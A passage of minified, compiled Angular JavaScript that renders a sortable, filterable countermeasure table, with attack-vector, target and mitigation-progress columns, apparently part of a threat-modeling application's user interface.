be(e),Me(B().OpenContextMenu(n,null))}),s(3),oe(4,"translate"),u(),s(5,"\n      "),u()}2&t&&(C(3),ke(re(4,1,"pages.modeling.countermeasuretable.noCountermeasures")))}function _0t(t,a){1&t&&(m(0,"th",32),s(1," "),u())}function g0t(t,a){if(1&t&&(m(0,"td",33),s(1," "),m(2,"mat-icon"),s(3),u(),s(4," "),u()),2&t){const e=a.$implicit,i=B();C(3),ke(i.GetStateIcon(e))}}function C0t(t,a){1&t&&(m(0,"th",34),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Number")," "))}function y0t(t,a){if(1&t&&(m(0,"td",33),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.Number," ")}}function b0t(t,a){1&t&&(m(0,"th",34),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Name")," "))}function M0t(t,a){if(1&t&&(m(0,"td",33),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.GetProperty("Name")," ")}}function v0t(t,a){1&t&&(m(0,"th",34),s(1," "),u())}function A0t(t,a){if(1&t&&(m(0,"td",33),s(1," "),m(2,"mat-icon",35),oe(3,"translate"),s(4),u(),s(5," "),u()),2&t){const e=a.$implicit,i=B();C(2),at("matTooltip",re(3,2,i.GetCreationTypeIconTooltip(e))),C(2),ke(i.GetCreationTypeIcon(e))}}function T0t(t,a){1&t&&(m(0,"th",34),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Control")," "))}function E0t(t,a){if(1&t&&(m(0,"td",33),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",null==e.Control?null:e.Control.GetProperty("Name")," ")}}function D0t(t,a){1&t&&(m(0,"th",34),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.AttackVectors")," "))}function x0t(t,a){if(1&t&&(m(0,"td",33),s(1),u()),2&t){const e=a.$implicit,i=B();C(1),ct(" ",i.GetAttackVectors(e)," ")}}function w0t(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Progress")," "))}function I0t(t,a){1&t&&it(0,"mat-progress-bar",38),2&t&&V("value",B().$implicit.MitigationProcess.Progress)}function R0t(t,a){if(1&t&&(m(0,"td",33),s(1," \n          "),ne(2,I0t,1,1,"mat-progress-bar",37),s(3,"\n        "),u()),2&t){const e=a.$implicit;C(2),V("ngIf",e.MitigationProcess)}}function S0t(t,a){1&t&&(m(0,"th",34),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"properties.Status")," "))}function k0t(t,a){if(1&t&&(m(0,"option",41),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetMitigationStateName(e)))}}function P0t(t,a){if(1&t){const e=Ye();m(0,"td",33),s(1,"\n          "),m(2,"select",39),he("ngModelChange",function(n){return Me(be(e).$implicit.MitigationState=n)}),s(3,"\n            "),ne(4,k0t,3,4,"option",40),s(5,"\n          "),u(),s(6,"\n        "),u()}if(2&t){const e=a.$implicit,i=B();C(2),V("ngModel",e.MitigationState),C(2),V("ngForOf",i.GetMitigationStates())}}function O0t(t,a){1&t&&(m(0,"th",34),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Targets")," "))}function N0t(t,a){if(1&t&&(m(0,"td",33),s(1),u()),2&t){const e=a.$implicit,i=B();Ct("selected-cell",i.IsElementSelected(e)),C(1),ct(" ",i.GetTargets(e)," ")}}function L0t(t,a){1&t&&(m(0,"th",36),s(1," "),u())}function z0t(t,a){if(1&t){const e=Ye();m(0,"td",33),s(1," "),m(2,"mat-icon",42),he("click",function(n){const c=be(e).$implicit;return Me(B().OpenContextMenu(n,c))}),oe(3,"translate"),s(4,"more_vert"),u(),s(5," "),u()}2&t&&(C(2),at("matTooltip",re(3,1,"general.More")))}function W0t(t,a){if(1&t){const e=Ye();m(0,"tr",47),he("click",function(){const r=be(e).$implicit;return Me(B().SelectCountermeasure(r))})("dblclick",function(n){const c=be(e).$implicit;return Me(B().OnMappingDblClick(c,n))})("contextmenu",function(n){const c=be(e).$implicit;return Me(B().OpenContextMenu(n,c))}),s(1,"\n      "),u()}if(2&t){const e=a.$implicit,i=B();Ct("selected-item",i.IsCountermeasureSelected(e))("removed-item",i.IsCountermeasureRemoved(e)||i.IsCountermeasureNotApplying(e)||i.IsCountermeasureRejected(e)||i.IsCountermeasureDuplicated(e))}}function F0t(t,a){if(1&t&&(m(0,"span",56),s(1),u()),2&t){const e=B().item;C(1),ke(e.GetProperty("Name"))}}function V0t(t,a){1&t&&(m(0,"span",56),s(1),oe(2,"translate"),u()),2&t&&(C(1),ke(re(2,1,"pages.modeling.threattable.noEntrySelected")))}function B0t(t,a){if(1&t){const e=Ye();m(0,"button",52),he("click",function(){const r=be(e).$implicit,c=B().item;return Me(B().AddExistingMitigationProcess(c,r))}),s(1),u()}if(2&t){const e=a.$implicit;C(1),ke(e.Name)}}function H0t(t,a){if(1&t){const e=Ye();s(0,"\n      "),ne(1,F0t,2,1,"span",48),s(2," \n      "),ne(3,V0t,3,3,"span",48),s(4,"\n      "),m(5,"button",49),he("click",function(){const r=be(e).item;return Me(B().OnMappingDblClick(r,null))}),s(6,"\n        "),m(7,"mat-icon"),s(8,"edit"),u(),s(9,"\n        "),m(10,"span"),s(11),oe(12,"translate"),u(),s(13,"\n      "),u(),s(14," \n      "),m(15,"button",50),s(16,"\n        "),m(17,"mat-icon"),s(18,"security"),u(),s(19,"\n        "),m(20,"span"),s(21),oe(22,"translate"),u(),s(23,"\n      "),u(),s(24,"\n      "),m(25,"mat-menu",null,51),s(27,"\n        "),m(28,"button",49),he("click",function(){const r=be(e).item;return Me(B().ViewMitigationProcess(r))}),s(29),oe(30,"translate"),u(),s(31,"\n        "),m(32,"button",52),he("click",function(){const r=be(e).item;return Me(B().AddMitigationProcess(r))}),s(33),oe(34,"translate"),u(),s(35,"\n        "),m(36,"button",53),s(37),oe(38,"translate"),u(),s(39,"\n      "),u(),s(40,"\n      "),m(41,"mat-menu",null,54),s(43,"\n        "),ne(44,B0t,2,1,"button",55),s(45,"\n      "),u(),s(46," \n      "),m(47,"button",49),he("click",function(){const r=be(e).item;return Me(B().OnDeleteMapping(r))}),s(48,"\n        "),m(49,"mat-icon"),s(50,"delete"),u(),s(51,"\n        "),m(52,"span"),s(53),oe(54,"translate"),u(),s(55,"\n      "),u(),s(56,"\n      "),m(57,"button",52),he("click",function(){return be(e),Me(B().ResetNumbers())}),s(58,"\n        "),m(59,"mat-icon"),s(60,"delete"),u(),s(61,"\n        "),m(62,"span"),s(63),oe(64,"translate"),u(),s(65,"\n      "),u(),s(66,"\n    ")}if(2&t){const e=a.item,i=Ti(26),n=Ti(42),r=B();C(1),V("ngIf",e),C(2),V("ngIf",!e),C(2),V("disabled",!e),C(6),ke(re(12,16,"pages.modeling.threattable.editEntry")),C(4),V("disabled",!e)("matMenuTriggerFor",i),C(6),ke(re(22,18,"properties.MitigationProcess")),C(7),V("disabled",null==e.MitigationProcess),C(1),ke(re(30,20,"pages.modeling.threattable.editEntry")),C(4),ke(re(34,22,"general.New")),C(3),V("matMenuTriggerFor",n),C(1),ke(re(38,24,"general.Existing")),C(7),V("ngForOf",r.GetPossibleMitigationProcesses(e)),C(3),V("disabled",!e),C(6),ke(re(54,26,"pages.modeling.threattable.deleteEntry")),C(10),ke(re(64,28,"pages.modeling.threattable.resetNumbers"))}}let U0t=(()=>{class t{constructor(e,i,n,r,c){this.theme=e,this.dataService=i,this.mitigationEngine=n,this.dialog=r,this.translate=c,this.changesCounter=0,this.isCalculatingCountermeasures=!1,this._countermeasures=[],this.displayedColumns=[],this.autoRefreshCountermeasures=!0,this.menuTopLeftPosition={x:"0",y:"0"},this.selectedObjectChanged=new Tt,this.countermeasureCountChanged=new Tt;let d=()=>{this.autoRefreshCountermeasures&&(0==this.changesCounter?setTimeout(()=>{this.isCalculatingCountermeasures=!0,this.changesCounter++},10):this.changesCounter++,setTimeout(()=>{this.changesCounter--,0==this.changesCounter&&this.RefreshCountermeasures()},500))};this.dataService.Project&&setTimeout(()=>{var T,k;null===(T=this.dataService.Project)||void 0===T||T.CountermeasuresChanged.subscribe(q=>d()),null===(k=this.dataService.Project)||void 0===k||k.AttackScenariosChanged.subscribe(q=>d())},1e3)}get refreshingCountermeasures(){return this.changesCounter>0||this.isCalculatingCountermeasures}get Countermeasures(){return this._countermeasures}set Countermeasures(e){this._filteredObject&&(e=e.filter(d=>d.Targets.includes(this._filteredObject))),this._countermeasures=e;const i=(d,T)=>{var k;return"name"==T?d.Name:"number"==T?Number(d.Number):"state"==T?d.MappingState:"type"==T?d.IsGenerated?1:0:"control"==T?null===(k=d.Control)||void 0===k?void 0:k.Name:"vectors"==T?this.GetAttackVectors(d):"status"==T?d.MappingState:"targets"==T?this.GetTargets(d):void console.error("Missing sorting header")},n=(d,T)=>{let k=T.trim().toLowerCase(),q=d.Name.toLowerCase().indexOf(k);return-1==q&&d.Control&&(q=d.Control.Name.toLowerCase().indexOf(k)),-1==q&&this.GetAttackVectors(d)&&(q=this.GetAttackVectors(d).toLowerCase().indexOf(k)),-1==q&&this.GetTargets(d)&&(q=this.GetTargets(d).toLowerCase().indexOf(k)),-1!=q},r=e.filter(d=>![Ra.NotApplicable,Ra.Rejected,Ra.Duplicate].includes(d.MitigationState));r.sort((d,T)=>Number(d.Number)<Number(T.Number)?-1:1),this.dataSourceActive=new zd(r),this.dataSourceActive.sort=this.sort,this.dataSourceActive.sortingDataAccessor=i,this.dataSourceActive.filterPredicate=n;const c=e.filter(d=>[Ra.NotApplicable,Ra.Rejected,Ra.Duplicate].includes(d.MitigationState));c.sort((d,T)=>Number(d.Number)<Number(T.Number)?-1:1),this.dataSourceNA=new zd(c),this.dataSourceNA.sort=this.sort,this.dataSourceNA.sortingDataAccessor=i,this.dataSourceNA.filterPredicate=n,this.sort&&this.sort.sortChange.emit(this.sort)}get selectedCountermeasure(){return this._selectedCountermeasure}set selectedCountermeasure(e){this._selectedCountermeasure=e}get selectedNode(){return this._selectedNode}set selectedNode(e){this._selectedNode=e,this.displayedColumns=["state","number","type","name","control","vectors","targets","progress","status","more"],this.RefreshCountermeasures()}get selectedObject(){return this._selectedObject}set selectedObject(e){var i;e&&(null===(i=this._selectedObject)||void 0===i?void 0:i.ID)==e.ID||(this._selectedObject=e)}set filteredObject(e){this._filteredObject=e,this.RefreshCountermeasures()}ngOnInit(){}onKeyDown(e){var i;if(this.isActive&&"TEXTAREA"!=(null===(i=document.activeElement)||void 0===i?void 0:i.tagName)){if(this.selectedCountermeasure){const n=(r,c)=>{this.SelectCountermeasure(r[c]);const d=this.rows.find(T=>T.nativeElement.id===r[c].ID);null==d||d.nativeElement.scrollIntoView({block:"center",behavior:"smooth"})};if("ArrowDown"==e.key){const r=this.dataSourceActive.sortData(this.dataSourceActive.filteredData,this.sort),c=r.indexOf(this.selectedCountermeasure);c<r.length-1&&n(r,c+1)}else if("ArrowUp"==e.key){const r=this.dataSourceActive.sortData(this.dataSourceActive.filteredData,this.sort),c=r.indexOf(this.selectedCountermeasure);c>0&&n(r,c-1)}}["ArrowDown","ArrowUp"].includes(e.key)&&(e.preventDefault(),e.stopImmediatePropagation())}}RefreshCountermeasures(){setTimeout(()=>{var e,i,n;this.Countermeasures=[],!(null===(e=this._selectedNode)||void 0===e)&&e.data&&((null===(i=this._selectedNode)||void 0===i?void 0:i.data)instanceof ns?this.Countermeasures=this.mitigationEngine.GenerateDiagramMitigations(this._selectedNode.data):(null===(n=this._selectedNode)||void 0===n?void 0:n.data)instanceof Om&&(this.Countermeasures=this.mitigationEngine.GenerateStackMitigations(this._selectedNode.data))),this.countermeasureCountChanged.emit(this.dataSourceActive.data.length),this.isCalculatingCountermeasures=!1},10)}OnMappingDblClick(e,i){if(i&&i.target&&"progress"==this.displayedColumns[i.target.cellIndex]&&e.MitigationProcess)this.ViewMitigationProcess(e);else{let n=null;this.selectedNode.data instanceof ns?n=this.selectedNode.data.Elements.GetChildrenFlat():this.selectedNode.data instanceof Om&&(n=this.selectedNode.data.GetChildrenFlat()),this.dialog.OpenCountermeasureDialog(e,!1,n,[...this.dataSourceActive.sortData(this.dataSourceActive.filteredData,this.sort),...this.dataSourceNA.sortData(this.dataSourceNA.filteredData,this.sort)])}}ApplyFilter(e){const i=e.target.value;this.dataSourceActive.filter=i.trim().toLowerCase(),this.dataSourceNA.filter=i.trim().toLowerCase()}IsCountermeasureSelected(e){return this.selectedCountermeasure==e}IsCountermeasureRemoved(e){return e.MappingState==zn.Removed}IsCountermeasureNotApplying(e){return e.MitigationState==Ra.NotApplicable}IsCountermeasureRejected(e){return e.MitigationState==Ra.Rejected}IsCountermeasureDuplicated(e){return e.MitigationState==Ra.Duplicate}SelectCountermeasure(e){var i;this.selectedCountermeasure=e,(null===(i=e.Targets)||void 0===i?void 0:i.length)>0&&this.selectedObjectChanged.emit(e.Targets[0])}IsElementSelected(e){return e&&this.selectedObject&&e.Targets.includes(this.selectedObject)}OnDeleteMapping(e){this.dataService.Project.DeleteCountermeasure(e),this.RefreshCountermeasures()}ResetNumbers(){const e=this.dataService.Project.GetCountermeasures().sort((i,n)=>Number(i.Number)-Number(n.Number));for(let i=0;i<e.length;i++)e[i].Number=(i+1).toString()}ViewMitigationProcess(e){this.dialog.OpenMitigationProcessDialog(e.MitigationProcess,!1)}AddMitigationProcess(e){let i=this.dataService.Project.CreateMitigationProcess();e.MitigationProcess=i,this.dialog.OpenMitigationProcessDialog(i,!0).subscribe(n=>{n||this.dataService.Project.DeleteMitigationProcess(i)})}GetPossibleMitigationProcesses(e){return this.dataService.Project.GetMitigationProcesses().filter(i=>i!=e.MitigationProcess)}AddExistingMitigationProcess(e,i){e.MitigationProcess=i}OpenContextMenu(e,i){e.preventDefault(),this.menuTopLeftPosition.x=e.clientX+"px",this.menuTopLeftPosition.y=e.clientY+"px",this.matMenuTrigger.menuData={item:i},this.matMenuTrigger.openMenu()}GetStateIcon(e){return e.MappingState==zn.New?"add":e.MappingState==zn.Removed?"remove":""}GetCreationTypeIcon(e){return e.IsGenerated?"settings_suggest":"handyman"}GetCreationTypeIconTooltip(e){return e.IsGenerated?"general.Generated":"general.Manual"}GetAttackVectors(e){return e.AttackVectors.map(i=>i.GetProperty("Name")).join(", ")}GetTargets(e){return e.Targets.filter(i=>i).map(i=>i.GetProperty("Name")).join(", ")}GetApplicableCount(){return Gi.Format(this.translate.instant("pages.modeling.threattable.applicable"),this.dataSourceActive.data.length.toString(),this.Countermeasures.length.toString())}GetMitigationStates(){return Sl.GetMitigationStates()}GetMitigationStateName(e){return Sl.ToString(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Hgt),Ee(Wn),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-countermeasure-table"]],viewQuery:function(e,i){if(1&e&&(Mi(po,5),Mi(al,5),Mi(xc,5,mi)),2&e){let n;Vt(n=Bt())&&(i.matMenuTrigger=n.first),Vt(n=Bt())&&(i.sort=n.first),Vt(n=Bt())&&(i.rows=n)}},hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,$c)},inputs:{isActive:"isActive",selectedNode:"selectedNode",selectedObject:"selectedObject",filteredObject:"filteredObject"},outputs:{selectedObjectChanged:"selectedObjectChanged",countermeasureCountChanged:"countermeasureCountChanged"},decls:193,vars:39,consts:[[2,"height","100%","display","grid","align-content","start"],[1,"tools"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",3,"matTooltip","click"],["matInput","",1,"filterInput",3,"spellcheck","placeholder","keyup"],["style","display: inline; vertical-align: super; margin-left: 5px;","mode","indeterminate",3,"diameter",4,"ngIf"],["style","float: right; padding-top: 5px;",4,"ngIf"],[2,"overflow","auto"],["mat-table","","matSort","","matSortActive","state","matSortDirection","asc","matSortDisableClear","",2,"width","100%",3,"dataSource"],["matColumnDef","state"],["mat-header-cell","","mat-sort-header","","style","width: 34px;",4,"matHeaderCellDef"],["mat-cell","",4,"matCellDef"],["matColumnDef","number"],["mat-header-cell","","mat-sort-header","",4,"matHeaderCellDef"],["matColumnDef","name"],["matColumnDef","type"],["matColumnDef","control"],["matColumnDef","vectors"],["matColumnDef","progress"],["mat-header-cell","",4,"matHeaderCellDef"],["matColumnDef","status"],["matColumnDef","targets"],["mat-cell","",3,"selected-cell",4,"matCellDef"],["matColumnDef","more"],["mat-header-row","","style","height: 30px;",4,"matHeaderRowDef","matHeaderRowDefSticky"],["mat-row","",3,"id","selected-item","removed-item","click","dblclick","contextmenu",4,"matRowDef","matRowDefColumns"],["class","mat-row",4,"matNoDataRow"],["mat-row","",3,"selected-item","removed-item","click","dblclick","contextmenu",4,"matRowDef","matRowDefColumns"],[2,"visibility","hidden","position","fixed",3,"matMenuTriggerFor"],["rightMenu","matMenu"],["matMenuContent",""],["mode","indeterminate",2,"display","inline","vertical-align","super","margin-left","5px",3,"diameter"],[2,"float","right","padding-top","5px"],["mat-header-cell","","mat-sort-header","",2,"width","34px"],["mat-cell",""],["mat-header-cell","","mat-sort-header",""],[3,"matTooltip"],["mat-header-cell",""],["class","disable","color","primary","style","width: 100px; margin-right: 3px;",3,"value",4,"ngIf"],["color","primary",1,"disable",2,"width","100px","margin-right","3px",3,"value"],[2,"width","140px",3,"ngModel","ngModelChange"],[3,"value",4,"ngFor","ngForOf"],[3,"value"],["matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-header-row","",2,"height","30px"],["mat-row","",3,"id","click","dblclick","contextmenu"],[1,"mat-row"],["colspan","9",1,"mat-cell",3,"contextmenu"],["mat-row","",3,"click","dblclick","contextmenu"],["style","margin-left: 20px; margin-right: 20px;",4,"ngIf"],["mat-menu-item","",3,"disabled","click"],["mat-menu-item","",3,"disabled","matMenuTriggerFor"],["procMenu","matMenu"],["mat-menu-item","",3,"click"],["mat-menu-item","",3,"matMenuTriggerFor"],["existing","matMenu"],["mat-menu-item","",3,"click",4,"ngFor","ngForOf"],[2,"margin-left","20px","margin-right","20px"]],template:function(e,i){if(1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"div",1),s(3,"\n    "),m(4,"button",2),he("click",function(){return i.RefreshCountermeasures()}),oe(5,"translate"),s(6,"\n      "),m(7,"mat-icon"),s(8,"refresh"),u(),s(9,"\n    "),u(),s(10,"\n    "),m(11,"button",2),he("click",function(){return i.autoRefreshCountermeasures=!i.autoRefreshCountermeasures}),oe(12,"translate"),s(13,"\n      "),m(14,"mat-icon"),s(15,"autorenew"),u(),s(16,"\n    "),u(),s(17,"\n    "),m(18,"input",3),he("keyup",function(r){return i.ApplyFilter(r)}),oe(19,"translate"),u(),s(20,"\n    "),ne(21,Ugt,1,1,"mat-progress-spinner",4),s(22,"\n    "),ne(23,qgt,2,1,"span",5),s(24,"\n  "),u(),s(25,"\n  "),m(26,"div",6),s(27,"\n    "),s(28,"\n    "),m(29,"table",7),s(30,"\n      "),bt(31,8),s(32,"\n        "),ne(33,Ggt,2,0,"th",9),s(34,"\n        "),ne(35,jgt,5,1,"td",10),s(36,"\n      "),Mt(),s(37,"\n      "),bt(38,11),s(39,"\n        "),ne(40,Qgt,3,3,"th",12),s(41,"\n        "),ne(42,$gt,2,1,"td",10),s(43,"\n      "),Mt(),s(44,"\n      "),bt(45,13),s(46,"\n        "),ne(47,Kgt,3,3,"th",12),s(48,"\n        "),ne(49,Xgt,2,1,"td",10),s(50,"\n      "),Mt(),s(51,"\n      "),bt(52,14),s(53,"\n        "),ne(54,Ygt,2,0,"th",12),s(55,"\n        "),ne(56,Jgt,6,4,"td",10),s(57,"\n      "),Mt(),s(58,"\n      "),bt(59,15),s(60,"\n        "),ne(61,Zgt,3,3,"th",12),s(62,"\n        "),ne(63,e0t,2,1,"td",10),s(64,"\n      "),Mt(),s(65,"\n      "),bt(66,16),s(67,"\n        "),ne(68,t0t,3,3,"th",12),s(69,"\n        "),ne(70,i0t,2,1,"td",10),s(71,"\n      "),Mt(),s(72,"\n      "),bt(73,17),s(74,"\n        "),ne(75,a0t,3,3,"th",18),s(76,"\n        "),ne(77,o0t,4,1,"td",10),s(78,"\n      "),Mt(),s(79,"\n      "),bt(80,19),s(81,"\n        "),ne(82,r0t,3,3,"th",12),s(83,"\n        "),ne(84,c0t,7,2,"td",10),s(85,"\n      "),Mt(),s(86,"\n      "),bt(87,20),s(88,"\n        "),ne(89,l0t,3,3,"th",12),s(90,"\n        "),ne(91,d0t,2,3,"td",21),s(92,"\n      "),Mt(),s(93,"\n      "),bt(94,22),s(95,"\n        "),ne(96,m0t,2,0,"th",18),s(97,"\n        "),ne(98,u0t,6,3,"td",10),s(99,"\n      "),Mt(),s(100,"\n  \n      "),ne(101,h0t,1,0,"tr",23),s(102,"\n      "),ne(103,f0t,2,5,"tr",24),s(104,"\n      "),ne(105,p0t,6,3,"tr",25),s(106,"\n    "),u(),s(107,"\n    "),s(108,"\n    "),m(109,"table",7),s(110,"\n      "),bt(111,8),s(112,"\n        "),ne(113,_0t,2,0,"th",9),s(114,"\n        "),ne(115,g0t,5,1,"td",10),s(116,"\n      "),Mt(),s(117,"\n      "),bt(118,11),s(119,"\n        "),ne(120,C0t,3,3,"th",12),s(121,"\n        "),ne(122,y0t,2,1,"td",10),s(123,"\n      "),Mt(),s(124,"\n      "),bt(125,13),s(126,"\n        "),ne(127,b0t,3,3,"th",12),s(128,"\n        "),ne(129,M0t,2,1,"td",10),s(130,"\n      "),Mt(),s(131,"\n      "),bt(132,14),s(133,"\n        "),ne(134,v0t,2,0,"th",12),s(135,"\n        "),ne(136,A0t,6,4,"td",10),s(137,"\n      "),Mt(),s(138,"\n      "),bt(139,15),s(140,"\n        "),ne(141,T0t,3,3,"th",12),s(142,"\n        "),ne(143,E0t,2,1,"td",10),s(144,"\n      "),Mt(),s(145,"\n      "),bt(146,16),s(147,"\n        "),ne(148,D0t,3,3,"th",12),s(149,"\n        "),ne(150,x0t,2,1,"td",10),s(151,"\n      "),Mt(),s(152,"\n      "),bt(153,17),s(154,"\n        "),ne(155,w0t,3,3,"th",18),s(156,"\n        "),ne(157,R0t,4,1,"td",10),s(158,"\n      "),Mt(),s(159,"\n      "),bt(160,19),s(161,"\n        "),ne(162,S0t,3,3,"th",12),s(163,"\n        "),ne(164,P0t,7,2,"td",10),s(165,"\n      "),Mt(),s(166,"\n      "),bt(167,20),s(168,"\n        "),ne(169,O0t,3,3,"th",12),s(170,"\n        "),ne(171,N0t,2,3,"td",21),s(172,"\n      "),Mt(),s(173,"\n      "),bt(174,22),s(175,"\n        "),ne(176,L0t,2,0,"th",18),s(177,"\n        "),ne(178,z0t,6,3,"td",10),s(179,"\n      "),Mt(),s(180,"\n  \n      "),ne(181,W0t,2,4,"tr",26),s(182,"\n    "),u(),s(183,"\n  "),u(),s(184,"\n  "),it(185,"div",27),s(186," \n  "),m(187,"mat-menu",null,28),s(189," \n    "),ne(190,H0t,67,30,"ng-template",29),s(191," \n  "),u(),s(192," \n"),u()),2&e){const n=Ti(188);C(4),at("matTooltip",re(5,33,"general.Refresh")),C(7),Ct("toolBtn-Selected",i.autoRefreshCountermeasures),at("matTooltip",re(12,35,"pages.modeling.threattable.autoRefresh")),C(7),ri("color",i.theme.IsDarkMode?"white":"black"),Ct("bg-color-light2",!i.theme.IsDarkMode)("bg-color-dark2",i.theme.IsDarkMode),at("placeholder",re(19,37,"pages.modeling.filter")),V("spellcheck",i.dataService.HasSpellCheck),C(3),V("ngIf",i.refreshingCountermeasures),C(2),V("ngIf",i.Countermeasures.length>0),C(6),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("dataSource",i.dataSourceActive),C(72),V("matHeaderRowDef",i.displayedColumns)("matHeaderRowDefSticky",!0),C(2),V("matRowDefColumns",i.displayedColumns),C(6),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("dataSource",i.dataSourceNA),C(72),V("matRowDefColumns",i.displayedColumns),C(4),ri("left",i.menuTopLeftPosition.x)("top",i.menuTopLeftPosition.y),V("matMenuTriggerFor",n)}},dependencies:[Zi,Ri,pm,_m,Ed,Ta,Ea,oa,da,Xa,xl,Xo,qo,po,el,Pa,Au,Tu,jh,xm,Dm,Du,Eu,wm,Qh,xc,Cp,al,bp,hA,Xi],styles:[".primary-color[_ngcontent-%COMP%], .selected-cell[_ngcontent-%COMP%], .selected-item[_ngcontent-%COMP%]   td[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}th[_ngcontent-%COMP%], td[_ngcontent-%COMP%]{font-size:small}tr[_ngcontent-%COMP%]{height:30px!important}th.mat-header-cell[_ngcontent-%COMP%]:first-of-type, td.mat-cell[_ngcontent-%COMP%]:first-of-type, td.mat-footer-cell[_ngcontent-%COMP%]:first-of-type{padding-left:5px!important}th.mat-header-cell[_ngcontent-%COMP%]:last-of-type, td.mat-cell[_ngcontent-%COMP%]:last-of-type, td.mat-footer-cell[_ngcontent-%COMP%]:last-of-type{padding-right:5px!important}.removed-item[_ngcontent-%COMP%]{opacity:.3}.tools[_ngcontent-%COMP%]{display:block;float:left;height:27px;width:calc(100% - 20px);font-size:12px}.toolBtn[_ngcontent-%COMP%]{width:30px;min-width:30px;padding:0;line-height:25px;margin-left:5px}.toolBtn-Selected[_ngcontent-%COMP%]{background-color:#ffffff26}.filterInput[_ngcontent-%COMP%]{margin-left:5px;width:200px;height:25px}.disable[_ngcontent-%COMP%]{pointer-events:none}"]}),t})();function q0t(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",14),he("click",function(){const r=be(e).$implicit;return Me(B().selectedTestCase=r)}),s(1,"\n          "),m(2,"mat-icon",15),s(3,"arrow_right"),u(),s(4,"\n          "),m(5,"div",16),s(6),u(),s(7,"\n          "),m(8,"div",16),s(9),oe(10,"translate"),oe(11,"translate"),u(),s(12,"\n          "),m(13,"button",17),he("click",function(){const r=be(e).$implicit;return Me(B().DeleteTestCase(r))}),oe(14,"translate"),m(15,"mat-icon"),s(16,"delete"),u()(),s(17,"\n        "),u()}if(2&t){const e=a.$implicit,i=B();Ct("highlight-light",i.selectedTestCase===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedTestCase===e&&i.theme.IsDarkMode),C(6),ke(e.GetLongName()),C(3),za("",re(10,8,"properties.Status"),": ",re(11,10,i.GetStatus(e.Status)),""),C(4),at("matTooltip",re(14,12,"general.Delete"))}}function G0t(t,a){if(1&t&&(bt(0),s(1,"\n        